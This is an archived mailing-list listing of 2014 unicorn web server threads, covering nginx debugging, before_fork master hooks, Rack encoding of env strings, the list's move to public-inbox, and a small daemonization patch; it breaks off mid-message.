  0 siblings, 0 replies; 200+ results
From: Imdad @ 2014-10-24 21:24 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Thanks Eric, will look into this issue.

It would be much appreciated if you could forward this issue to someone
who can help.

Thanks again for your cooperation.

Cheers!
Imdad Ali Khan
Mob (0) 9818484057
http://www.linkedin.com/in/imdad

On 25 October 2014 02:28, Eric Wong <e@80x24.org> wrote:

> Imdad <khanimdad@gmail.com> wrote:
> > My app logs (shared/log/production.log) and /var/log/nginx/error.log both
> > are empty
>
> I'm not up-to-date on Rails logging these days (see Rails docs if nobody
> else answers), but for nginx, you can use this to increase verbosity:
>
>         error_log /path/to/nginx/error.log debug
>
> ref: http://nginx.org/en/docs/ngx_core_module.html#error_log
>
> In unicorn, you can also bypass nginx for debugging purposes by
> setting up another listener on any port you want:
>
>         listen 12345
>


^ permalink raw reply	[relevance 0%]

* Re: Having issue with Unicorn
  @ 2014-10-24 20:58  5%                   ` Eric Wong
  2014-10-24 21:24  0%                     ` Imdad
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2014-10-24 20:58 UTC (permalink / raw)
  To: Imdad; +Cc: unicorn-public

Imdad <khanimdad@gmail.com> wrote:
> My app logs (shared/log/production.log) and /var/log/nginx/error.log both
> are empty

I'm not up-to-date on Rails logging these days (see Rails docs if nobody
else answers), but for nginx, you can use this to increase verbosity:

	error_log /path/to/nginx/error.log debug

ref: http://nginx.org/en/docs/ngx_core_module.html#error_log

In unicorn, you can also bypass nginx for debugging purposes by
setting up another listener on any port you want:

	listen 12345

^ permalink raw reply	[relevance 5%]

* Reserved workers not as webservers
@ 2014-10-09 12:24  4% Bráulio Bhavamitra
  0 siblings, 0 replies; 200+ results
From: Bráulio Bhavamitra @ 2014-10-09 12:24 UTC (permalink / raw)
  To: unicorn-public

Hello all,

I'm quite amazed at how much preloading and forking can reduce memory
usage. To use even less memory and restart the app faster, the next
step would be to incorporate other daemons (also part of the app, in my
case delayed_job and feed-updater) as unicorn workers.

This would be very useful, as restarting unicorn would also restart
these daemons. Another benefit of incorporating daemons into unicorn is
sharing the pidfile.

For it to work properly I would have to reserve some workers for these
daemons. Today I would simply put a condition on worker.nr and run
daemon-specific code there. It might be better to have a different type
of worker designed for this.

But something I don't know how to do is prevent HTTP requests from
being forwarded to these workers. How could I do that?

Have you ever thought of doing this?

best regards,
bráulio
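For concreteness, the worker.nr dispatch described above might be
sketched as follows (hypothetical role names; unicorn itself has no
built-in non-HTTP worker type):

```ruby
# Map reserved worker numbers to daemon roles; everything else
# serves HTTP as usual. In a unicorn config this lookup would run
# in after_fork to decide what each forked worker does.
RESERVED = { 0 => :delayed_job, 1 => :feed_updater }

def role_for(worker_nr)
  RESERVED.fetch(worker_nr, :http)
end
```

The open question in the message above remains: a reserved worker
still inherits the listener sockets from the master, so something
would have to stop it from accepting requests.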

^ permalink raw reply	[relevance 4%]

* Re: Master hooks needed
  2014-10-03 12:22  4% ` Eric Wong
  2014-10-03 12:36  0%   ` Valentin Mihov
@ 2014-10-04  0:53  0%   ` Bráulio Bhavamitra
  1 sibling, 0 replies; 200+ results
From: Bráulio Bhavamitra @ 2014-10-04  0:53 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

The problem is actually worse, and worker.nr == 0 can't be used.
I had to do something like this:

master_run = true

before_fork do |server, worker|
  if master_run
     #warm up server...

     #kill old pid...

     #disconnect active record

     master_run = false
  end

  # other stuff for each worker
end

In the last example, using worker.nr == 0 would make the server crash
if worker 0 was killed/restarted.

Also, the ActiveRecord disconnect and many other things people put in
before_fork should only run once, after the master has preloaded, not
for every worker.

So I still think at least a hook like master_preloaded(server) is necessary.

cheers,
bráulio

On Fri, Oct 3, 2014 at 9:22 AM, Eric Wong <e@80x24.org> wrote:
> Bráulio Bhavamitra <braulio@eita.org.br> wrote:
>> Hello all,
>>
>> If I need to hook something after master load, I'm currently doing:
>>
>> before_fork do |server, worker|
>>   # worker 0 is the first to init, so hold the master here
>>   if worker.nr == 0
>>      #warm up server...
>>
>>      #kill old pid...
>>   end
>>
>>   # other stuff for each worker
>> end
>>
>> Both operations I currently do (server warm up and old pid kill) need
>> to be run only once, and not for every worker as before_fork does,
>> that's why I had to put the condition seen above.
>
> The above is fine if your first worker never dies.  I think you can add
> a local variable to ensure it only runs the first time worker.nr == 0 is
> started, in case a worker dies.  Something like:
>
>     first = true
>     before_fork do |server, worker|
>       # worker 0 is the first to init, so hold the master here
>       if worker.nr == 0 && first
>          first = false
>          #warm up server...
>
>          #kill old pid...
>       end
>
>       # other stuff for each worker
>     end
>
> For what it's worth, I'm not a fan of auto-killing the old PID in the
> unicorn config and regret having it in the example config.  It's only
> for the most memory-constrained configs and fragile (because anything
> with pid files is always fragile).
>
>> So hooks for master is needed, something like
>> master_after_load(server) and master_init(server).
>>
>> What do you think?
>
> rack.git also has a Rack::Builder#warmup method.  Aman originally
> proposed it for unicorn, but it's useful outside of unicorn so
> we moved it to Rack.
>
> In general, I'm against adding new hooks/options because they tend to
> make maintainability and documentation harder for ops folks.
> I still have nightmares of some Capistrano config filled with hooks
> from years ago :x
>
> Features like these also makes migrating away from unicorn harder, so
> that is another reason we ended up adding #warmup to Rack and not
> unicorn.

^ permalink raw reply	[relevance 0%]

* Re: Master hooks needed
  2014-10-03 12:22  4% ` Eric Wong
@ 2014-10-03 12:36  0%   ` Valentin Mihov
  2014-10-04  0:53  0%   ` Bráulio Bhavamitra
  1 sibling, 0 replies; 200+ results
From: Valentin Mihov @ 2014-10-03 12:36 UTC (permalink / raw)
  To: Eric Wong; +Cc: Bráulio Bhavamitra, unicorn-public

On Fri, Oct 3, 2014 at 3:22 PM, Eric Wong <e@80x24.org> wrote:
>
> Bráulio Bhavamitra <braulio@eita.org.br> wrote:
> > Hello all,
> >
> > If I need to hook something after master load, I'm currently doing:
> >
> > before_fork do |server, worker|
> >   # worker 0 is the first to init, so hold the master here
> >   if worker.nr == 0
> >      #warm up server...
> >
> >      #kill old pid...
> >   end
> >
> >   # other stuff for each worker
> > end
> >
> > Both operations I currently do (server warm up and old pid kill) need
> > to be run only once, and not for every worker as before_fork does,
> > that's why I had to put the condition seen above.
>
> The above is fine if your first worker never dies.  I think you can add
> a local variable to ensure it only runs the first time worker.nr == 0 is
> started, in case a worker dies.  Something like:
>
>     first = true
>     before_fork do |server, worker|
>       # worker 0 is the first to init, so hold the master here
>       if worker.nr == 0 && first
>          first = false
>          #warm up server...
>
>          #kill old pid...
>       end
>
>       # other stuff for each worker
>     end
>
> For what it's worth, I'm not a fan of auto-killing the old PID in the
> unicorn config and regret having it in the example config.  It's only
> for the most memory-constrained configs and fragile (because anything
> with pid files is always fragile).
>
> > So hooks for master is needed, something like
> > master_after_load(server) and master_init(server).
> >
> > What do you think?
>
> rack.git also has a Rack::Builder#warmup method.  Aman originally
> proposed it for unicorn, but it's useful outside of unicorn so
> we moved it to Rack.
>
> In general, I'm against adding new hooks/options because they tend to
> make maintainability and documentation harder for ops folks.
> I still have nightmares of some Capistrano config filled with hooks
> from years ago :x
>
> Features like these also makes migrating away from unicorn harder, so
> that is another reason we ended up adding #warmup to Rack and not
> unicorn.
>

Isn't it much better to do the warmup in an initializer instead of in
unicorn? That way you can set preload_app=true and the master will
execute the warmup code before forking. Killing the old pid is probably
what stops you from doing that, right?

--Valentin

^ permalink raw reply	[relevance 0%]

* Re: Master hooks needed
  @ 2014-10-03 12:22  4% ` Eric Wong
  2014-10-03 12:36  0%   ` Valentin Mihov
  2014-10-04  0:53  0%   ` Bráulio Bhavamitra
  0 siblings, 2 replies; 200+ results
From: Eric Wong @ 2014-10-03 12:22 UTC (permalink / raw)
  To: Bráulio Bhavamitra; +Cc: unicorn-public

Bráulio Bhavamitra <braulio@eita.org.br> wrote:
> Hello all,
> 
> If I need to hook something after master load, I'm currently doing:
> 
> before_fork do |server, worker|
>   # worker 0 is the first to init, so hold the master here
>   if worker.nr == 0
>      #warm up server...
> 
>      #kill old pid...
>   end
> 
>   # other stuff for each worker
> end
> 
> Both operations I currently do (server warm-up and old pid kill) need
> to be run only once, and not for every worker as before_fork does;
> that's why I had to put the condition seen above.

The above is fine if your first worker never dies.  I think you can add
a local variable to ensure it only runs the first time worker.nr == 0 is
started, in case a worker dies.  Something like:

    first = true
    before_fork do |server, worker|
      # worker 0 is the first to init, so hold the master here
      if worker.nr == 0 && first
         first = false
         #warm up server...

         #kill old pid...
      end

      # other stuff for each worker
    end

For what it's worth, I'm not a fan of auto-killing the old PID in the
unicorn config and regret having it in the example config.  It's only
for the most memory-constrained configs and fragile (because anything
with pid files is always fragile).

> So hooks for the master are needed, something like
> master_after_load(server) and master_init(server).
> 
> What do you think?

rack.git also has a Rack::Builder#warmup method.  Aman originally
proposed it for unicorn, but it's useful outside of unicorn so
we moved it to Rack.

In general, I'm against adding new hooks/options because they tend to
make maintainability and documentation harder for ops folks.
I still have nightmares of some Capistrano config filled with hooks
from years ago :x

Features like these also make migrating away from unicorn harder, so
that is another reason we ended up adding #warmup to Rack and not
unicorn.
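For reference, the Rack::Builder#warmup mentioned above is used from
config.ru roughly like this (a sketch; availability and the exact
location of Rack::MockRequest vary by Rack version):

```ruby
# config.ru -- warmup runs the block once with the fully-built app
# before the server starts accepting real requests.
require 'rack'
require 'rack/mock'

warmup do |app|
  client = Rack::MockRequest.new(app)
  client.get('/') # example request to prime caches/connections
end

run ->(env) { [200, { 'Content-Type' => 'text/plain' }, ['ok']] }
```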

^ permalink raw reply	[relevance 4%]

* Re: Rack encodings (was: Please move to github)
  2014-08-05  5:56  4% Gary Grossman
@ 2014-08-05  6:28  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-08-05  6:28 UTC (permalink / raw)
  To: Gary Grossman; +Cc: hongli, unicorn-public, michael, mfischer

Gary Grossman <gary.grossman@gmail.com> wrote:
> It feels like we were getting some momentum on an important but
> long-dormant issue here... maybe it's time to move this discussion
> to rack-devel?

Sure, rack-devel is a pretty dormant mailing list but there's been a
burst of activity a few weeks ago.

Unlike this list, subscription is required to post; and first posts
from newbies are moderated.  For folks who do not log in to Google
(crazies like me :P) subscription is possible without any login
or password: rack-devel+subscribe@googlegroups.com

> Perhaps there's another Rack luminary who can lead
> the charge, or at least see if there's some consensus after a few
> more years of shared experience on what "sane" encodings might
> look like.

At least there's other server implementers who'll probably
chime in.

> A lightweight way to move the implementation forward might be a
> simple Rack middleware gem which sets the new encodings on the 
> environment, or adding the functionality to rack itself. Once
> developers were comfortable with the new regime, the app servers
> could follow suit and put those encodings in the env natively,
> and the Rubyland implementation of the new encodings could be
> dropped.

Sounds like a good plan.  Thanks for bringing more attention to this.

^ permalink raw reply	[relevance 0%]

* Re: Rack encodings (was: Please move to github)
@ 2014-08-05  5:56  4% Gary Grossman
  2014-08-05  6:28  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Gary Grossman @ 2014-08-05  5:56 UTC (permalink / raw)
  To: hongli; +Cc: unicorn-public, michael, e, mfischer, gary.grossman

It feels like we were getting some momentum on an important but
long-dormant issue here... maybe it's time to move this discussion
to rack-devel? Perhaps there's another Rack luminary who can lead
the charge, or at least see if there's some consensus after a few
more years of shared experience on what "sane" encodings might
look like.

A lightweight way to move the implementation forward might be a
simple Rack middleware gem which sets the new encodings on the 
environment, or adding the functionality to rack itself. Once
developers were comfortable with the new regime, the app servers
could follow suit and put those encodings in the env natively,
and the Rubyland implementation of the new encodings could be
dropped.

Gary


^ permalink raw reply	[relevance 4%]

* Re: Rack encodings (was: Please move to github)
  2014-08-04  8:48  6%         ` Rack encodings (was: Please move to github) Eric Wong
@ 2014-08-04  9:46  0%           ` Hongli Lai
  0 siblings, 0 replies; 200+ results
From: Hongli Lai @ 2014-08-04  9:46 UTC (permalink / raw)
  To: Eric Wong; +Cc: Michael Fischer, Gary Grossman, unicorn-public, Michael Grosser

On Mon, Aug 4, 2014 at 10:48 AM, Eric Wong <e@80x24.org> wrote:
> Fair enough.  Would you/Phusion be comfortable taking the lead here?
> This feels like another "hot potato" issue :>

Unfortunately, we're too busy with a major project to be able to lead
this effort.

-- 
Phusion | Web Application deployment, scaling, and monitoring solutions

Web: http://www.phusion.nl/
E-mail: info@phusion.nl
Chamber of commerce no: 08173483 (The Netherlands)

^ permalink raw reply	[relevance 0%]

* Rack encodings (was: Please move to github)
  @ 2014-08-04  8:48  6%         ` Eric Wong
  2014-08-04  9:46  0%           ` Hongli Lai
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2014-08-04  8:48 UTC (permalink / raw)
  To: Hongli Lai
  Cc: Michael Fischer, Gary Grossman, unicorn-public, Michael Grosser

(Long overdue Subject: change)

Hongli Lai <hongli@phusion.nl> wrote:
> Hi guys. Phusion Passenger author here. I would very much support
> standardization of encoding issues.

> At this point, I don't really care what the standard is, as long as
> it's a sane standard that everybody can follow.

Fair enough.  Would you/Phusion be comfortable taking the lead here?
This feels like another "hot potato" issue :>

> In my opinion, following Encoding.default_external is not helpful.
> Most users have absolutely no idea how to configure
> Encoding.default_external, or even know that it exists. I've also
> never, ever seen anybody who does *not* want default_external to be
> UTF-8. If it's not set to UTF-8, then it's always by accident (e.g.
> the user not knowing that it depends on LC_CTYPE, that LC_CTYPE is set
> differently in the shell than from an init script, or even what
> LC_CTYPE is).

Perhaps we need to educate users to set LC_CTYPE/LC_ALL/LANG so
Encoding.default_external works as intended?  Adding another
option to Rack is just as likely to get missed.

Maybe servers could emit a big warning saying:

    WARNING: Encoding.default_external is not UTF-8 ...

And add a --quiet-utf8-warning option for the few folks who really do
not want UTF-8.
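A sketch of what such a startup check could look like (hypothetical; the
flag name and wording are only Eric's suggestion, not an implemented
option):

```ruby
# Hypothetical startup warning: returns nil when the external encoding
# is already UTF-8 (or the operator opted out), a warning string
# otherwise; the server would print it once at boot.
def utf8_warning(enc = Encoding.default_external, quiet: false)
  return nil if quiet || enc == Encoding::UTF_8
  "WARNING: Encoding.default_external is not UTF-8 (got #{enc}); " \
  "check LC_ALL/LC_CTYPE/LANG, or pass --quiet-utf8-warning to silence"
end

puts utf8_warning(Encoding::US_ASCII) # prints the warning for a non-UTF-8 locale
```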

^ permalink raw reply	[relevance 6%]

* Re: Please move to github
  2014-08-02  8:50  3% ` Eric Wong
@ 2014-08-02 19:07  0%   ` Gary Grossman
    0 siblings, 1 reply; 200+ results
From: Gary Grossman @ 2014-08-02 19:07 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public, michael

Hi Eric,

Thanks for your reply and for reviewing the patch!

>Right, the Rack spec does not dictate this.  Doing this out-of-spec has
>the ability to break existing apps as well as compatibility with other
>app servers.

It's true, my patch is too naive since it's a pretty drastic change
in behavior not behind any kind of switch.

>What do other app servers do?

I did a little survey. ASCII-8BIT is kind of the de facto standard
even if it's not mandated by the Rack specification. Phusion
Passenger, Thin and WEBrick all send mostly ASCII-8BIT strings in
the env.

>My main concern is having more different behavior between various Rack
>servers servers, making it harder to switch between them.

Very valid; Rack wouldn't be much of a standard if there were a bunch
of variants in use.

>Another concern is breaking apps which are already working around this
>but work with non-UTF-8 encodings.

We'd pretty much need to introduce some kind of configuration
switch, at least for the short term and maybe for the long term.
The hope would be that it could become the default setting.
Apps that don't use UTF8 should be able to set their desired default
external encoding appropriately.

>The rack-devel mailing list had a discussion on this in September 2010
>and a decision was never reached. You can search the archives at:
>http://groups.google.com/group/rack-devel

I came across this thread but didn't realize that was the last word
so far when it came to Rack and encodings.

This might be one of those instances where it would be helpful for
implementation to lead specification. Unicorn is one of the leading
servers of its genre, if not the leader. If you supported a switch
that made the encoding regime more sane, I think other popular servers
like Thin and Passenger would swiftly follow and it might re-energize
the discussion about getting encodings into the Rack spec once and
for all, and give a base for experimentation and iteration for
getting the encodings in the spec right.

There's a lot of developer pain here. Many apps probably are serving
up encoding-related 500 errors without knowing it. There are
stories of developers adding "# encoding" everywhere, setting
the external/internal encoding, and then "things are fine until it
blows up somewhere else." I heard recently that a very large company
has stuck with Ruby 1.8.7, probably to avoid these encoding issues
among other things. It would be nice to improve the situation.

>Disclaimer: I am not an encoding expert, so for that reason I prefer
>to let other Rack folks make the decision.

I'm not an encoding expert either! Most people aren't... which is
why it'd be nice if they didn't have to know so much about it when
they write a Rack app!

>Do you have performance measurements for doing this as pure-Ruby
>middleware vs your patch?

I don't have measurements currently but I'll get some.
Our app is several years old and so there's a lot of stuff in
request.env by the time we get around to forcing everything to
UTF8 encoding. I wouldn't be surprised if the hit on
every single request is small but significant for us.

>So it would be best if there were a way to do this for all Rack
>servers.

Thanks again for reviewing the patch. I'll work on a new patch that
incorporates your comments and has a switch for enabling/disabling
the functionality, and I'll try to follow roughly what the spec
group in 2010 thought would make sense in terms of encodings for
the various strings in the env. And I'll see if I can ask the
Rack folks to chime in.

Gary


^ permalink raw reply	[relevance 0%]

* Re: Please move to github
  @ 2014-08-02  8:50  3% ` Eric Wong
  2014-08-02 19:07  0%   ` Gary Grossman
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2014-08-02  8:50 UTC (permalink / raw)
  To: Gary Grossman; +Cc: unicorn-public, michael

Gary Grossman <gary.grossman@gmail.com> wrote:
> Hi Eric,
> 
> I work with Michael, and this discussion sure got off on the
> wrong foot... we love unicorn and use it heavily, and just
> want to contribute back to it.

No worries, cultural differences happen.  Thanks for following up.

> To detail the encoding problem we were trying to fix, unicorn
> uses rb_str_new in several places to create Ruby strings.
> For Ruby 1.9 and later, these strings are assigned ASCII-8BIT
> encoding.
> 
> While the Rack specification doesn't dictate what encoding
> should be used for strings in the environment, many
> developers would probably expect the default external encoding
> setting in Encoding.default_external to be used.

Right, the Rack spec does not dictate this.  Doing this out-of-spec has
the ability to break existing apps as well as compatibility with other
app servers.

What do other app servers do?

My main concern is having more divergent behavior between various Rack
servers, making it harder to switch between them.

Another concern is breaking apps which are already working around this
but work with non-UTF-8 encodings.

The rack-devel mailing list had a discussion on this in September 2010
and a decision was never reached. You can search the archives at:
http://groups.google.com/group/rack-devel

I've also saved the thread to a mbox at
http://80x24.org/rack-devel-encoding-2010.mbox.gz
since Google Groups archives are a bit painful to navigate.

Disclaimer: I am not an encoding expert, so for that reason I prefer
to let other Rack folks make the decision.

> Many Rails applications use UTF8 heavily. The use of ASCII-8BIT
> in the env can lead to Encoding::CompatibilityErrors being
> raised when a UTF8 string and ASCII-8BIT string are concatenated,
> which happens frequently when properties like request.url are
> referenced in erb templates. To get around these problems,
> an app would have to force encoding on the strings in the env
> manually. It seems a shame to do this in slower Ruby code when
> it could be done up front by unicorn.

Yes, this existing behavior sucks on UTF-8-heavy apps.  I would rather
not add more unicorn-only options which make switching between servers
harder.
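The breakage described above is easy to reproduce (a standalone sketch;
the strings are just examples): concatenating a UTF-8 string with binary
(ASCII-8BIT) data containing high bytes raises, unless the encoding is
forced first.

```ruby
utf8   = "caf\u00e9"              # UTF-8 string, as app code produces
binary = "r\xC3\xA9sum\xC3\xA9".b # ASCII-8BIT, like env strings from rb_str_new

error = begin
  utf8 + binary # incompatible: UTF-8 + binary with non-ASCII bytes
  nil
rescue Encoding::CompatibilityError => e
  e.class
end
puts error # => Encoding::CompatibilityError

# the workaround apps must apply by hand today:
fixed = binary.dup.force_encoding(Encoding::UTF_8)
puts utf8 + fixed # => caférésumé
```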

Do you have performance measurements for doing this as pure-Ruby
middleware vs your patch?

My dislike of lock-in also applies to app servers.  Application-visible
differences like these should be avoided so people can switch between
servers, too.

So it would be best if there were a way to do this for all Rack
servers.

> We'd like to propose that unicorn use rb_external_str_new to
> make strings instead of rb_str_new.
> 
> Perhaps you have your reasons for continuing to use rb_str_new
> but we figured we'd run this by you.

If the Rack spec mandated encodings, I would do it in a heartbeat.

> Subject: [PATCH] If unicorn is used with Ruby 1.9 or later, use
>  rb_external_str_new instead of rb_str_new to create strings. The resulting
>  strings will use the default external encoding. Continue using rb_str_new for
>  older versions of Ruby.

A better, shorter, more direct subject would be:

Subject: use Encoding.default_external for header values

Commit message body is fine <snip>

> +#ifdef HAVE_RUBY_ENCODING_H
> +/* Use default external encoding for strings for Ruby 1.9+,
> + * fall back to rb_str_new when unavailable */
> +#define rb_str_new rb_external_str_new
> +#endif

This is too heavy-handed, as some strings (buffers) may
need to stay binary via rb_str_new.  If we were to do this, it would
be something like:

#ifdef HAVE_RUBY_ENCODING_H
#  define env_val_new(ptr,len) rb_external_str_new((ptr),(len))
#else
#  define env_val_new(ptr,len) rb_str_new((ptr),(len))
#endif

... And only making sure header values are set to external.

Last I checked the HTTP RFCs (it's been a while) header keys are
required to be US-ASCII-only (and our parser enforces that).

> +  def test_encoding
> +    if ''.respond_to?(:encoding)
> +      client = MockRequest.new("GET http://e:3/x?y=z HTTP/1.1\r\n" \
> +                               "Host: foo\r\n\r\n")
> +      env = @request.read(client)
> +      encoding = Encoding.default_external
> +      assert_equal encoding, env['REQUEST_PATH'].encoding
> +      assert_equal encoding, env['PATH_INFO'].encoding
> +      assert_equal encoding, env['QUERY_STRING'].encoding
> +    end

This would need to test and work with (and appropriately reject)
invalid requests with bad encodings, too.
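That rejection boils down to a validity check; a sketch of what such a
test would need to cover (the byte sequences here are hypothetical
examples):

```ruby
# A header value carrying the external encoding must actually be valid
# in it; requests where it is not should be rejected (e.g. with a 400).
good = "/caf\xC3\xA9".dup.force_encoding(Encoding::UTF_8) # valid UTF-8
bad  = "/caf\xFF".dup.force_encoding(Encoding::UTF_8)     # invalid byte

puts good.valid_encoding? # => true
puts bad.valid_encoding?  # => false
```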

^ permalink raw reply	[relevance 3%]

* Re: Dealing with big uploads and/or slow clients
  @ 2014-06-06  5:59  5%     ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-06-06  5:59 UTC (permalink / raw)
  To: Sam Saffron; +Cc: Bráulio Bhavamitra, unicorn-public

Sam Saffron <sam.saffron@gmail.com> wrote:
> Wouldn't you just use Rack Hijack for this, you can easily pull the
> socket out of the pipeline and then deal with the upload via
> eventmachine or what not.

Sure, but is that something Bráulio can drop in and use right
away?  I expect he's already running nginx.

If he's going to be doing that, it's probably easier to just use another
server altogether.  yahns[1] is pretty great for that.

[1] http://yahns.yhbt.net/README  (the unicorn site has been running on
    it since November)

^ permalink raw reply	[relevance 5%]

* Re: [ANN] unicorn 4.8.3 - the end of an era
  2014-05-07 20:33  6%     ` Michael Fischer
@ 2014-05-07 21:25  0%       ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-05-07 21:25 UTC (permalink / raw)
  To: Michael Fischer
  Cc: Eric Wong, Jérémy Lecour, Liste Unicorn, unicorn-public

Michael Fischer <mfischer@zendesk.com> wrote:
> Is there some compelling reason why the mailing list simply cannot be
> moved to another provider?  IMHO your users and fellow developers
> shouldn't have to do anything other than change the submission
> address.

We would need to migrate again if/when that provider goes dead or
service starts deteriorating.  Ease-of-migration and being forkable
again in the future was the top priority.

If I'm hit by a bus or start allowing too much spam, it should be
trivially easy to migrate the project[1] and all its archives and
infrastructure.

> I respect your desire to power the communication platform with free
> software (and I'm sure this can still be done with Mailman or
> whatever), but keep in mind the practical reality of our time, where
most of us these days are now comfortably using Webmail or POP/IMAP
> against a remote server that's not under the user's control and have
> no desire to implement yet another communication conduit.

I will probably take the addresses of active subscribers who've posted
here[2] and import them into the new delivery system, even.

It would be great to be able to make the list of ML subscribers public,
too, to ensure forkability.  I'm not sure how the lurkers will react to
that, though...


[1] of course, whoever takes over may not be a Free Software zealot
    like myself.
[2] those addresses are already public, but lurkers will probably
    have to resubscribe (or use ssoma or the Atom feed).

^ permalink raw reply	[relevance 0%]

* Re: [ANN] unicorn 4.8.3 - the end of an era
  @ 2014-05-07 20:33  6%     ` Michael Fischer
  2014-05-07 21:25  0%       ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Michael Fischer @ 2014-05-07 20:33 UTC (permalink / raw)
  To: Eric Wong; +Cc: Jérémy Lecour, Liste Unicorn, unicorn-public

On Wed, May 7, 2014 at 2:46 AM, Eric Wong <e@80x24.org> wrote:

> Jérémy Lecour <jeremy.lecour@gmail.com> wrote:
> > Would you mind explaining what a regular subscriber has to do to keep
> > receiving those emails in their inbox?
>
> You use ssoma[1] to import mail into your inbox.  This is like how
> slrnpull works with NNTP or getmail/fetchmail works with POP.  It's
> only a one-way sync, but you can import it into an IMAP folder.
>
> Currently there's no SMTP delivery component, but I could probably set
> one up this week if there's enough demand for one.  The subscriber list
> will be public, though.

Is there some compelling reason why the mailing list simply cannot be
moved to another provider?  IMHO your users and fellow developers
shouldn't have to do anything other than change the submission
address.

I respect your desire to power the communication platform with free
software (and I'm sure this can still be done with Mailman or
whatever), but keep in mind the practical reality of our time, where
most of us these days are now comfortably using Webmail or POP/IMAP
against a remote server that's not under the user's control and have
no desire to implement yet another communication conduit.

Thanks,

--Michael

^ permalink raw reply	[relevance 6%]

* Re: [ANN] unicorn 4.8.3 - the end of an era
    @ 2014-05-07 12:08  5% ` Bráulio Bhavamitra
  1 sibling, 0 replies; 200+ results
From: Bráulio Bhavamitra @ 2014-05-07 12:08 UTC (permalink / raw)
  To: Eric Wong; +Cc: Unicorn, unicorn-public

+1, pushing users to ssoma when the email standards ecosystem is so
firmly established is way too much...

Another mailing list on another server should be created...

regards,
bráulio

On Wed, May 7, 2014 at 5:05 AM, Eric Wong <e@80x24.org> wrote:
> Changes:
>
> This release updates documentation to reflect the migration of the
> mailing list to a new public-inbox[1] instance.  This is necessary
> due to the impending RubyForge shutdown on May 15, 2014.
>
> The public-inbox address is: unicorn-public@bogomips.org
>     (no subscription required, plain text only)
> ssoma[2] git archives: git://bogomips.org/unicorn-public
> browser-friendly archives: http://bogomips.org/unicorn-public/
>
> Using, getting help for, and contributing to unicorn will never
> require any of the following:
>
> 1) non-Free software (including SaaS)
> 2) registration or sign-in of any kind
> 3) a real identity (we accept mail from Mixmaster)
> 4) a graphical user interface
>
> Nowadays, plain-text email is the only ubiquitous platform which
> meets all our requirements for communication.
>
> There is also one small bugfix to handle premature grandparent death
> upon initial startup.  Most users are unaffected.
>
> [1] policy: http://public-inbox.org/ - git://80x24.org/public-inbox
>     an "archives first" approach to mailing lists
> [2] mechanism: http://ssoma.public-inbox.org/ - git://80x24.org/ssoma
>     some sort of mail archiver (using git)
>
> * http://unicorn.bogomips.org/
> * unicorn-public@bogomips.org
> * git://bogomips.org/unicorn.git
> * http://unicorn.bogomips.org/NEWS.atom.xml
>
> --
> Eric Wong
> __
> http://bogomips.org/unicorn-public/ - unicorn-public@bogomips.org
> please quote as little as necessary when replying



-- 
"Lute pela sua ideologia. Seja um com sua ideologia. Viva pela sua
ideologia. Morra por sua ideologia" P.R. Sarkar

EITA - Educação, Informação e Tecnologias para Autogestão
http://cirandas.net/brauliobo
http://eita.org.br

"Paramapurusha é meu pai e Parama Prakriti é minha mãe. O universo é
meu lar e todos nós somos cidadãos deste cosmo. Este universo é a
imaginação da Mente Macrocósmica, e todas as entidades estão sendo
criadas, preservadas e destruídas nas fases de extroversão e
introversão do fluxo imaginativo cósmico. No âmbito pessoal, quando
uma pessoa imagina algo em sua mente, naquele momento, essa pessoa é a
única proprietária daquilo que ela imagina, e ninguém mais. Quando um
ser humano criado mentalmente caminha por um milharal também
imaginado, a pessoa imaginada não é a propriedade desse milharal, pois
ele pertence ao indivíduo que o está imaginando. Este universo foi
criado na imaginação de Brahma, a Entidade Suprema, por isso a
propriedade deste universo é de Brahma, e não dos microcosmos que
também foram criados pela imaginação de Brahma. Nenhuma propriedade
deste mundo, mutável ou imutável, pertence a um indivíduo em
particular; tudo é o patrimônio comum de todos."
Restante do texto em
http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia

^ permalink raw reply	[relevance 5%]

* [RFC/PATCH] http_server: handle premature grandparent death
@ 2014-05-02 23:15  4% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-05-02 23:15 UTC (permalink / raw)
  To: mongrel-unicorn, unicorn-public

When daemonizing, it is possible for the grandparent to be
terminated by another process before the master can notify
it.  Do not abort the master in this case.

This may fix the following issue:

	https://github.com/kostya/eye/issues/49

(which I was notified of privately via email)
---
 Will push and tag 4.8.3 this weekend (along with mailing list change).

 lib/unicorn/http_server.rb | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 21cb9a1..a0ca302 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -272,7 +272,11 @@ def join
     proc_name 'master'
     logger.info "master process ready" # test_exec.rb relies on this message
     if @ready_pipe
-      @ready_pipe.syswrite($$.to_s)
+      begin
+        @ready_pipe.syswrite($$.to_s)
+      rescue => e
+        logger.warn("grandparent died too soon?: #{e.message} (#{e.class})")
+      end
       @ready_pipe = @ready_pipe.close rescue nil
     end
     begin
-- 
Eric Wong

^ permalink raw reply related	[relevance 4%]

* listen loop error in 4.8.0
@ 2014-01-27 16:56  5% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-01-27 16:56 UTC (permalink / raw)
  To: mongrel-unicorn

Hey all, I'm trying to diagnose an issue with another user over
private email.

It seems io.close in the trap(:QUIT) handler of the worker process is
causing an IOError, which means an IO in the readers array already got
closed somehow.  This shouldn't happen, and CRuby 2.x doesn't seem
to interrupt itself inside signal handlers[1].

Below is what I have so far...

Worst case is we're not any worse off than before; but we
could be hiding another bug with the "rescue nil" on io.close.

An extra set of eyes would be appreciated.

Pushed to the llerrloop branch of git://bogomips.org/unicorn.git
Also on rubygems.org: gem install --pre -v 4.8.0.1.g10a2 unicorn

[1] - however other Ruby runtimes may.

Subject: [PATCH] http_server: safer SIGQUIT handler for worker

This protects us from two potential errors:

